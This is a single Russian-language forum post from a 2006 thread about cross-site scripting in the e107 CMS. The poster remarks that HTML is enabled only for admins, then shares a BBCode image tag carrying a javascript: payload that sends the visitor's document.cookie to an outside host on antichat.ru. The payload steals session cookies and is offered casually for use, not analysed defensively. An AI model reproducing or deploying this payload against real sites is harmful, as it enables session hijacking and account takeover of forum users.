Тема: XSS в e107
Показать сообщение отдельно

  #3  
Старый 19.11.2006, 19:42
CtHuLhU
Новичок
Регистрация: 12.11.2006
Сообщений: 9
Провел на форуме:
95494

Репутация: 2
По умолчанию

HTML по дефолту разрешен админу. Обычным пользователям - нет. Потому на локалеке и катит.

вот ещё нашёл. правда же примитив? =)

[im*g]javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;[/im*g]

Последний раз редактировалось CtHuLhU; 19.11.2006 в 19:46..
 
Ответить с цитированием